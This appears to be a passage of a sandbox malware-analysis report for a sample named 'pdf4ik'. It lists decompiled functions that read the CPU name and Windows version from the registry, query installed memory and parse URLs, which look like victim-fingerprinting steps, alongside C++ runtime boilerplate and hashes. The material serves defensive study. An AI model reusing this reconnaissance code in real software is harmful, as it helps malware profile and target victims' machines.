                                        				_push(E29DC1C88);
                                        				_push( *[fs:0x0]);
                                        				_t28 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t28 ^ _t70);
                                        				 *[fs:0x0] =  &_v16;
                                        				E29DADA5D( &_v28, 0);
                                        				_v8 = 0;
                                        				_t50 =  *0x29dd8824; // 0x2bab2f48
                                        				_v20 = _t50;
                                        				if( *0x29de9034 == 0) {
                                        					E29DADA5D( &_v24, 0);
                                        					if( *0x29de9034 == 0) {
                                        						_t47 =  *0x29dd6b04; // 0x3
                                        						_t48 = _t47 + 1;
                                        						 *0x29dd6b04 = _t48;
                                        						 *0x29de9034 = _t48;
                                        					}
                                        					E29DADA85( &_v24);
                                        				}
                                        				_t67 =  *0x29de9034;
                                        				_t32 =  *_t65;
                                        				if(_t67 >=  *((intOrPtr*)(_t32 + 0xc))) {
                                        					_t53 = 0;
                                        					goto L6;
                                        				} else {
                                        					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + _t67 * 4));
                                        					if(_t53 != 0) {
                                        						L10:
                                        						_t68 = _t53;
                                        						L11:
                                        						if(_t68 != 0) {
                                        							L19:
                                        							_v8 = 0xffffffff;
                                        							E29DADA85( &_v28);
                                        							 *[fs:0x0] = _v16;
                                        							return _t68;
                                        						}
                                        						L12:
                                        						if(_t50 == 0) {
                                        							_t36 = E29DA7F60(_t64,  &_v20, _t65);
                                        							__eflags = _t36 - 0xffffffff;
                                        							if(_t36 == 0xffffffff) {
                                        								E29DAE158( &_v40, "bad cast");
                                        								E29DAFF06( &_v40, 0x29dd20f4);
                                        							}
                                        							_t68 = _v20;
                                        							 *0x29dd8824 = _t68;
                                        							E29DADA5D( &_v24, 0);
                                        							_t38 =  *((intOrPtr*)(_t68 + 4));
                                        							__eflags = _t38 - 0xffffffff;
                                        							if(_t38 < 0xffffffff) {
                                        								_t41 = _t38 + 1;
                                        								__eflags = _t41;
                                        								 *((intOrPtr*)(_t68 + 4)) = _t41;
                                        							}
                                        							E29DADA85( &_v24);
                                        							E29DAD6BC(__eflags, _t68);
                                        						} else {
                                        							_t68 = _t50;
                                        						}
                                        						goto L19;
                                        					}
                                        					L6:
                                        					if( *((char*)(_t32 + 0x14)) == 0) {
                                        						goto L10;
                                        					}
                                        					_t44 = E29DAD733();
                                        					if(_t67 >=  *((intOrPtr*)(_t44 + 0xc))) {
                                        						goto L12;
                                        					}
                                        					_t64 =  *((intOrPtr*)(_t44 + 8));
                                        					_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + _t67 * 4));
                                        					goto L11;
                                        				}
                                        			}

                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7D0C
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7D2F
                                        • std::bad_exception::bad_exception.LIBCMT ref: 29DA7DB0
                                        • __CxxThrowException@8.LIBCMT ref: 29DA7DBE
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7DD1
                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 29DA7DEB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                        • String ID: bad cast
                                        • API String ID: 2427920155-3145022300
                                        • Opcode ID: 6a2fce78189c2384ba08850af7c4b23dd6ecb1f9c3a15ab9470d0fbe985d8fd2
                                        • Instruction ID: 4b818ad56df6924ffdfad3a5f7b4b68b337dd0ca2efe36e5458a4a2ba387989a
                                        • Opcode Fuzzy Hash: 6a2fce78189c2384ba08850af7c4b23dd6ecb1f9c3a15ab9470d0fbe985d8fd2
                                        • Instruction Fuzzy Hash: A331D672D01144DFCB14DF54C990FAEB3B8EF24720F54825DD961A7A80DB346E16EBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E29DA7E20(intOrPtr* __edi) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				char _v20;
                                        				char _v24;
                                        				char _v28;
                                        				char _v40;
                                        				signed int _t28;
                                        				intOrPtr _t32;
                                        				void* _t36;
                                        				intOrPtr _t38;
                                        				intOrPtr _t41;
                                        				void* _t44;
                                        				signed int _t47;
                                        				signed int _t48;
                                        				char _t50;
                                        				intOrPtr _t53;
                                        				intOrPtr* _t65;
                                        				signed int _t67;
                                        				intOrPtr _t68;
                                        				signed int _t70;
                                        
                                        				_t65 = __edi;
                                        				_push(0xffffffff);
                                        				_push(E29DC1C88);
                                        				_push( *[fs:0x0]);
                                        				_t28 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t28 ^ _t70);
                                        				 *[fs:0x0] =  &_v16;
                                        				E29DADA5D( &_v28, 0);
                                        				_v8 = 0;
                                        				_t50 =  *0x29dd8828; // 0x2bab2f70
                                        				_v20 = _t50;
                                        				if( *0x29de9038 == 0) {
                                        					E29DADA5D( &_v24, 0);
                                        					if( *0x29de9038 == 0) {
                                        						_t47 =  *0x29dd6b04; // 0x3
                                        						_t48 = _t47 + 1;
                                        						 *0x29dd6b04 = _t48;
                                        						 *0x29de9038 = _t48;
                                        					}
                                        					E29DADA85( &_v24);
                                        				}
                                        				_t67 =  *0x29de9038;
                                        				_t32 =  *_t65;
                                        				if(_t67 >=  *((intOrPtr*)(_t32 + 0xc))) {
                                        					_t53 = 0;
                                        					goto L6;
                                        				} else {
                                        					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + _t67 * 4));
                                        					if(_t53 != 0) {
                                        						L10:
                                        						_t68 = _t53;
                                        						L11:
                                        						if(_t68 != 0) {
                                        							L19:
                                        							_v8 = 0xffffffff;
                                        							E29DADA85( &_v28);
                                        							 *[fs:0x0] = _v16;
                                        							return _t68;
                                        						}
                                        						L12:
                                        						if(_t50 == 0) {
                                        							_t36 = E29DA8020( &_v20, _t65);
                                        							__eflags = _t36 - 0xffffffff;
                                        							if(_t36 == 0xffffffff) {
                                        								E29DAE158( &_v40, "bad cast");
                                        								E29DAFF06( &_v40, 0x29dd20f4);
                                        							}
                                        							_t68 = _v20;
                                        							 *0x29dd8828 = _t68;
                                        							E29DADA5D( &_v24, 0);
                                        							_t38 =  *((intOrPtr*)(_t68 + 4));
                                        							__eflags = _t38 - 0xffffffff;
                                        							if(_t38 < 0xffffffff) {
                                        								_t41 = _t38 + 1;
                                        								__eflags = _t41;
                                        								 *((intOrPtr*)(_t68 + 4)) = _t41;
                                        							}
                                        							E29DADA85( &_v24);
                                        							E29DAD6BC(__eflags, _t68);
                                        						} else {
                                        							_t68 = _t50;
                                        						}
                                        						goto L19;
                                        					}
                                        					L6:
                                        					if( *((char*)(_t32 + 0x14)) == 0) {
                                        						goto L10;
                                        					}
                                        					_t44 = E29DAD733();
                                        					if(_t67 >=  *((intOrPtr*)(_t44 + 0xc))) {
                                        						goto L12;
                                        					}
                                        					_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + _t67 * 4));
                                        					goto L11;
                                        				}
                                        			}


                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7E4C
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7E6F
                                        • std::bad_exception::bad_exception.LIBCMT ref: 29DA7EF0
                                        • __CxxThrowException@8.LIBCMT ref: 29DA7EFE
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA7F11
                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 29DA7F2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                        • String ID: bad cast
                                        • API String ID: 2427920155-3145022300
                                        • Opcode ID: f0b5df5633a1167ce0aa9a71e157912708c5e3feea2bf838b0be31d0e362e896
                                        • Instruction ID: 6a069c61c03413cfb048f1eeddb8389c21c1339adef3ff2c67110e64c9eaae23
                                        • Opcode Fuzzy Hash: f0b5df5633a1167ce0aa9a71e157912708c5e3feea2bf838b0be31d0e362e896
                                        • Instruction Fuzzy Hash: 7731B272C002459BCB14DF54C990B9EB3B8EF24720F50825DD965A7A80DB346F16EBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E29DA2340(intOrPtr* __edi) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				char _v20;
                                        				char _v24;
                                        				char _v28;
                                        				char _v40;
                                        				signed int _t28;
                                        				intOrPtr _t32;
                                        				void* _t36;
                                        				intOrPtr _t38;
                                        				intOrPtr _t41;
                                        				void* _t44;
                                        				signed int _t47;
                                        				signed int _t48;
                                        				char _t50;
                                        				intOrPtr _t53;
                                        				intOrPtr* _t65;
                                        				signed int _t67;
                                        				intOrPtr _t68;
                                        				signed int _t70;
                                        
                                        				_t65 = __edi;
                                        				_push(0xffffffff);
                                        				_push(E29DC1C88);
                                        				_push( *[fs:0x0]);
                                        				_t28 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t28 ^ _t70);
                                        				 *[fs:0x0] =  &_v16;
                                        				E29DADA5D( &_v28, 0);
                                        				_v8 = 0;
                                        				_t50 =  *0x29dd881c; // 0x2bab2a30
                                        				_v20 = _t50;
                                        				if( *0x29dd6b08 == 0) {
                                        					E29DADA5D( &_v24, 0);
                                        					if( *0x29dd6b08 == 0) {
                                        						_t47 =  *0x29dd6b04; // 0x3
                                        						_t48 = _t47 + 1;
                                        						 *0x29dd6b04 = _t48;
                                        						 *0x29dd6b08 = _t48;
                                        					}
                                        					E29DADA85( &_v24);
                                        				}
                                        				_t67 =  *0x29dd6b08; // 0x1
                                        				_t32 =  *_t65;
                                        				if(_t67 >=  *((intOrPtr*)(_t32 + 0xc))) {
                                        					_t53 = 0;
                                        					goto L6;
                                        				} else {
                                        					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + _t67 * 4));
                                        					if(_t53 != 0) {
                                        						L10:
                                        						_t68 = _t53;
                                        						L11:
                                        						if(_t68 != 0) {
                                        							L19:
                                        							_v8 = 0xffffffff;
                                        							E29DADA85( &_v28);
                                        							 *[fs:0x0] = _v16;
                                        							return _t68;
                                        						}
                                        						L12:
                                        						if(_t50 == 0) {
                                        							_t36 = E29D98B30( &_v20, _t65);
                                        							__eflags = _t36 - 0xffffffff;
                                        							if(_t36 == 0xffffffff) {
                                        								E29DAE158( &_v40, "bad cast");
                                        								E29DAFF06( &_v40, 0x29dd20f4);
                                        							}
                                        							_t68 = _v20;
                                        							 *0x29dd881c = _t68;
                                        							E29DADA5D( &_v24, 0);
                                        							_t38 =  *((intOrPtr*)(_t68 + 4));
                                        							__eflags = _t38 - 0xffffffff;
                                        							if(_t38 < 0xffffffff) {
                                        								_t41 = _t38 + 1;
                                        								__eflags = _t41;
                                        								 *((intOrPtr*)(_t68 + 4)) = _t41;
                                        							}
                                        							E29DADA85( &_v24);
                                        							E29DAD6BC(__eflags, _t68);
                                        						} else {
                                        							_t68 = _t50;
                                        						}
                                        						goto L19;
                                        					}
                                        					L6:
                                        					if( *((char*)(_t32 + 0x14)) == 0) {
                                        						goto L10;
                                        					}
                                        					_t44 = E29DAD733();
                                        					if(_t67 >=  *((intOrPtr*)(_t44 + 0xc))) {
                                        						goto L12;
                                        					}
                                        					_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + _t67 * 4));
                                        					goto L11;
                                        				}
                                        			}


                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA236C
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA238F
                                        • std::bad_exception::bad_exception.LIBCMT ref: 29DA2410
                                        • __CxxThrowException@8.LIBCMT ref: 29DA241E
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA2431
                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 29DA244B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                        • String ID: bad cast
                                        • API String ID: 2427920155-3145022300
                                        • Opcode ID: c21c820efad1e7f340574aa1ddd6744ef9271acb058916abe1e7c4f2036068ef
                                        • Instruction ID: 6d6706a5d4bab55ec3e7ba8af44f6630c6568f258cbb35c87cffc23523156379
                                        • Opcode Fuzzy Hash: c21c820efad1e7f340574aa1ddd6744ef9271acb058916abe1e7c4f2036068ef
                                        • Instruction Fuzzy Hash: B031E872800605DFCB04DF95C980B9E77B4EF25730F60825EDA61A7A90DB346E16EBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E29DA2480(intOrPtr* __edi) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				char _v20;
                                        				char _v24;
                                        				char _v28;
                                        				char _v40;
                                        				signed int _t28;
                                        				intOrPtr _t32;
                                        				void* _t36;
                                        				intOrPtr _t38;
                                        				intOrPtr _t41;
                                        				void* _t44;
                                        				signed int _t47;
                                        				signed int _t48;
                                        				char _t50;
                                        				intOrPtr _t53;
                                        				intOrPtr* _t65;
                                        				signed int _t67;
                                        				intOrPtr _t68;
                                        				signed int _t70;
                                        
                                        				_t65 = __edi;
                                        				_push(0xffffffff);
                                        				_push(E29DC1C88);
                                        				_push( *[fs:0x0]);
                                        				_t28 =  *0x29dd5664; // 0xd9555f04
                                        				_push(_t28 ^ _t70);
                                        				 *[fs:0x0] =  &_v16;
                                        				E29DADA5D( &_v28, 0);
                                        				_v8 = 0;
                                        				_t50 =  *0x29dd8820; // 0x0
                                        				_v20 = _t50;
                                        				if( *0x29de9030 == 0) {
                                        					E29DADA5D( &_v24, 0);
                                        					if( *0x29de9030 == 0) {
                                        						_t47 =  *0x29dd6b04; // 0x3
                                        						_t48 = _t47 + 1;
                                        						 *0x29dd6b04 = _t48;
                                        						 *0x29de9030 = _t48;
                                        					}
                                        					E29DADA85( &_v24);
                                        				}
                                        				_t67 =  *0x29de9030;
                                        				_t32 =  *_t65;
                                        				if(_t67 >=  *((intOrPtr*)(_t32 + 0xc))) {
                                        					_t53 = 0;
                                        					goto L6;
                                        				} else {
                                        					_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + _t67 * 4));
                                        					if(_t53 != 0) {
                                        						L10:
                                        						_t68 = _t53;
                                        						L11:
                                        						if(_t68 != 0) {
                                        							L19:
                                        							_v8 = 0xffffffff;
                                        							E29DADA85( &_v28);
                                        							 *[fs:0x0] = _v16;
                                        							return _t68;
                                        						}
                                        						L12:
                                        						if(_t50 == 0) {
                                        							_t36 = E29DA25C0( &_v20, _t65);
                                        							__eflags = _t36 - 0xffffffff;
                                        							if(_t36 == 0xffffffff) {
                                        								E29DAE158( &_v40, "bad cast");
                                        								E29DAFF06( &_v40, 0x29dd20f4);
                                        							}
                                        							_t68 = _v20;
                                        							 *0x29dd8820 = _t68;
                                        							E29DADA5D( &_v24, 0);
                                        							_t38 =  *((intOrPtr*)(_t68 + 4));
                                        							__eflags = _t38 - 0xffffffff;
                                        							if(_t38 < 0xffffffff) {
                                        								_t41 = _t38 + 1;
                                        								__eflags = _t41;
                                        								 *((intOrPtr*)(_t68 + 4)) = _t41;
                                        							}
                                        							E29DADA85( &_v24);
                                        							E29DAD6BC(__eflags, _t68);
                                        						} else {
                                        							_t68 = _t50;
                                        						}
                                        						goto L19;
                                        					}
                                        					L6:
                                        					if( *((char*)(_t32 + 0x14)) == 0) {
                                        						goto L10;
                                        					}
                                        					_t44 = E29DAD733();
                                        					if(_t67 >=  *((intOrPtr*)(_t44 + 0xc))) {
                                        						goto L12;
                                        					}
                                        					_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)) + _t67 * 4));
                                        					goto L11;
                                        				}
                                        			}


                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA24AC
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA24CF
                                        • std::bad_exception::bad_exception.LIBCMT ref: 29DA2550
                                        • __CxxThrowException@8.LIBCMT ref: 29DA255E
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 29DA2571
                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 29DA258B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                        • String ID: bad cast
                                        • API String ID: 2427920155-3145022300
                                        • Opcode ID: 4e0cb798a1c4472fe9de4b3c362eb1a38e6c6f8ab719149c4d71a4fef5be2492
                                        • Instruction ID: af283dd92ee02d36d538e0bec96718f2e73b0ded7a93530ef3fda5a6b1e0c695
                                        • Opcode Fuzzy Hash: 4e0cb798a1c4472fe9de4b3c362eb1a38e6c6f8ab719149c4d71a4fef5be2492
                                        • Instruction Fuzzy Hash: 2D31E572801245DFCB19DF54D990B9DB3B8FF24720F60825DDA11A7AC0DB34AE16EBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E29DA3010(void* __ebx, void* __edi, void* __esi) {
                                        				signed int _v8;
                                        				char _v263;
                                        				char _v264;
                                        				char _v520;
                                        				void* _v524;
                                        				int _v528;
                                        				signed int _t14;
                                        				void* _t26;
                                        				void* _t34;
                                        				void* _t35;
                                        				signed int _t36;
                                        
                                        				_t35 = __esi;
                                        				_t34 = __edi;
                                        				_t26 = __ebx;
                                        				_t14 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t14 ^ _t36;
                                        				_v528 = 0xff;
                                        				_v264 = 0;
                                        				E29DB5640( &_v263, 0, 0xfe);
                                        				if(RegOpenKeyExA(0x80000002, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20119,  &_v524) == 0) {
                                        					RegQueryValueExA(_v524, "ProcessorNameString", 0, 0,  &_v264,  &_v528);
                                        				}
                                        				RegCloseKey(_v524);
                                        				CharToOemA( &_v264,  &_v520);
                                        				return E29DADF46( &_v520, _t26, _v8 ^ _t36, _v524, _t34, _t35);
                                        			}















                                        APIs
                                        • _memset.LIBCMT ref: 29DA3042
                                        • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 29DA3062
                                        • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 29DA308A
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3097
                                        • CharToOemA.USER32(00000000,?), ref: 29DA30AB
                                        Strings
                                        • ProcessorNameString, xrefs: 29DA3084
                                        • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 29DA3058
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CharCloseOpenQueryValue_memset
                                        • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                        • API String ID: 2235053359-2804670039
                                        • Opcode ID: 878badf7c51ff0715829667180d2610769860b35d2ff267668f18dff510a4a65
                                        • Instruction ID: db0eea26ceb6b65914aa5ba2df7adffd5e3cb3c193f0a46470cd0527f1ac7bb0
                                        • Opcode Fuzzy Hash: 878badf7c51ff0715829667180d2610769860b35d2ff267668f18dff510a4a65
                                        • Instruction Fuzzy Hash: 1B11CCB654031CABD764DF50DD89FDAB3B8DB14700F4041D8E619A7181DA745A859F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E29DA33A0(void* __ebx, void* __edi, void* __esi) {
                                        				signed int _v8;
                                        				char _v263;
                                        				char _v264;
                                        				char _v520;
                                        				void* _v524;
                                        				int _v528;
                                        				signed int _t14;
                                        				void* _t26;
                                        				void* _t34;
                                        				void* _t35;
                                        				signed int _t36;
                                        
                                        				_t35 = __esi;
                                        				_t34 = __edi;
                                        				_t26 = __ebx;
                                        				_t14 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t14 ^ _t36;
                                        				_v528 = 0xff;
                                        				_v264 = 0;
                                        				E29DB5640( &_v263, 0, 0xfe);
                                        				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119,  &_v524) == 0) {
                                        					RegQueryValueExA(_v524, "ProductName", 0, 0,  &_v264,  &_v528);
                                        				}
                                        				RegCloseKey(_v524);
                                        				CharToOemA( &_v264,  &_v520);
                                        				return E29DADF46( &_v520, _t26, _v8 ^ _t36, _v524, _t34, _t35);
                                        			}















                                        APIs
                                        • _memset.LIBCMT ref: 29DA33D2
                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 29DA33F2
                                        • RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 29DA341A
                                        • RegCloseKey.ADVAPI32(?), ref: 29DA3427
                                        • CharToOemA.USER32(00000000,?), ref: 29DA343B
                                        Strings
                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 29DA33E8
                                        • ProductName, xrefs: 29DA3414
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CharCloseOpenQueryValue_memset
                                        • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 2235053359-1787575317
                                        • Opcode ID: ae0de1f9bd64ee073a35c6802ae5de3effa9f63ed36c4547aaaa28bdf735b5fb
                                        • Instruction ID: 6e433d97dbbd6e1cea36fd4d45dfd355b300304480d0f068e324b2267d32f24e
                                        • Opcode Fuzzy Hash: ae0de1f9bd64ee073a35c6802ae5de3effa9f63ed36c4547aaaa28bdf735b5fb
                                        • Instruction Fuzzy Hash: 6011DFB654031CABD724DF90DD89FDAB378DF14700F1081DCE619A7181EA746B849F60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DA32B0(void* __ebx, void* __edi) {
                                        				signed int _v8;
                                        				struct _MEMORYSTATUSEX _v76;
                                        				void* __esi;
                                        				signed int _t12;
                                        				void* _t17;
                                        				unsigned int _t18;
                                        				unsigned int _t22;
                                        				void* _t23;
                                        				signed int _t25;
                                        				void* _t29;
                                        				void* _t30;
                                        				CHAR* _t31;
                                        				signed int _t32;
                                        
                                        				_t30 = __edi;
                                        				_t23 = __ebx;
                                        				_t12 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t12 ^ _t32;
                                        				_t31 = HeapAlloc(GetProcessHeap(), 0, 0x104);
                                        				_t17 = E29DB5640( &_v76, 0, 0x40);
                                        				_v76.dwLength = 0x40;
                                        				GlobalMemoryStatusEx( &_v76);
                                        				if(_t17 != 1) {
                                        					_t25 = 0;
                                        					_t18 = 0;
                                        				} else {
                                        					_t22 = _v76.ullAvailPhys;
                                        					_t25 = (_t22 << 0x00000020 | _v76.ullTotalPhys) >> 0x14;
                                        					_t18 = _t22 >> 0x14;
                                        				}
                                        				wsprintfA(_t31, "%d MB", _t25);
                                        				return E29DADF46(_t31, _t23, _v8 ^ _t32, _t29, _t30, _t31, _t18);
                                        			}

















                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 29DA32C8
                                        • HeapAlloc.KERNEL32(00000000), ref: 29DA32CF
                                        • _memset.LIBCMT ref: 29DA32DF
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 29DA32F2
                                        • wsprintfA.USER32 ref: 29DA3318
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocGlobalMemoryProcessStatus_memsetwsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 3402858368-3474575989
                                        • Opcode ID: 980e41a70710567646819b0ca0ec6faa1bf8c22e5ded907eca0b2ba9d81193e2
                                        • Instruction ID: 58e32109f267edf72c49d97d0f702af87f9a0d56b147243f9f4680960d30a669
                                        • Opcode Fuzzy Hash: 980e41a70710567646819b0ca0ec6faa1bf8c22e5ded907eca0b2ba9d81193e2
                                        • Instruction Fuzzy Hash: 4B01A2B2E40108BBD704AFA4DD4AFAEB778EF04700F44415DFA06EB280DE74990297A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E29D97DC0(void* __ebx, void* __edi, CHAR* __esi) {
                                        				signed int _v8;
                                        				char _v72;
                                        				intOrPtr _v124;
                                        				char* _v128;
                                        				void* _v132;
                                        				signed int _t11;
                                        				int _t18;
                                        				char* _t19;
                                        				void* _t21;
                                        				void* _t26;
                                        				signed int _t28;
                                        
                                        				_t27 = __esi;
                                        				_t26 = __edi;
                                        				_t21 = __ebx;
                                        				_t11 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t11 ^ _t28;
                                        				E29DB5640( &_v72, 0, 0x40);
                                        				E29DB5640( &_v132, 0, 0x3c);
                                        				_t25 =  &_v72;
                                        				_v132 = 0x3c;
                                        				_v128 =  &_v72;
                                        				_v124 = 0x40;
                                        				_t18 = InternetCrackUrlA(__esi, lstrlenA(__esi), 0x10000000,  &_v132);
                                        				_t19 = _v128;
                                        				if(_t18 == 0) {
                                        					_t19 = "http";
                                        				}
                                        				return E29DADF46(_t19, _t21, _v8 ^ _t28, _t25, _t26, _t27);
                                        			}















                                        APIs
                                        • _memset.LIBCMT ref: 29D97DDB
                                        • _memset.LIBCMT ref: 29D97DE8
                                        • lstrlenA.KERNEL32(00000000,10000000,?), ref: 29D97E0E
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 29D97E16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memset$CrackInternetlstrlen
                                        • String ID: <$@$http
                                        • API String ID: 3332450456-26727890
                                        • Opcode ID: 3b4d35e5a94999b6c0c5ce17b0621af158697fa57366ddfdac395ab433963d6f
                                        • Instruction ID: 327f4e71e53712e3efa0362528e7c828fb98b35af8aa9a5ec3ad30405e52380a
                                        • Opcode Fuzzy Hash: 3b4d35e5a94999b6c0c5ce17b0621af158697fa57366ddfdac395ab433963d6f
                                        • Instruction Fuzzy Hash: 8C016271900208ABEB10EFA8DC45FED77BCEF18600F50401DE605EB180DB7466059BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E29DA1370(void* __ecx) {
                                        				signed char* _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				intOrPtr _v28;
                                        				signed char _v32;
                                        				signed char* _v48;
                                        				signed int _v49;
                                        				char _v56;
                                        				signed char** _v60;
                                        				char _v64;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				signed int _t87;
                                        				signed int _t88;
                                        				signed char _t91;
                                        				signed char _t95;
                                        				signed char** _t100;
                                        				signed char _t101;
                                        				signed char** _t103;
                                        				signed char** _t107;
                                        				signed char* _t110;
                                        				signed char* _t115;
                                        				void* _t116;
                                        				void* _t117;
                                        				signed int _t129;
                                        				char _t134;
                                        				intOrPtr _t135;
                                        				signed char** _t136;
                                        				intOrPtr _t137;
                                        				signed char** _t148;
                                        				void* _t151;
                                        				void* _t152;
                                        				signed char** _t154;
                                        				void* _t156;
                                        				signed char** _t158;
                                        				signed char _t160;
                                        				signed char _t162;
                                        				signed int _t166;
                                        				void* _t167;
                                        				void* _t168;
                                        				void* _t169;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC2128);
                                        				_push( *[fs:0x0]);
                                        				_t168 = _t167 - 0x30;
                                        				_t87 =  *0x29dd5664; // 0xd9555f04
                                        				_t88 = _t87 ^ _t166;
                                        				_v20 = _t88;
                                        				_push(_t116);
                                        				_push(_t88);
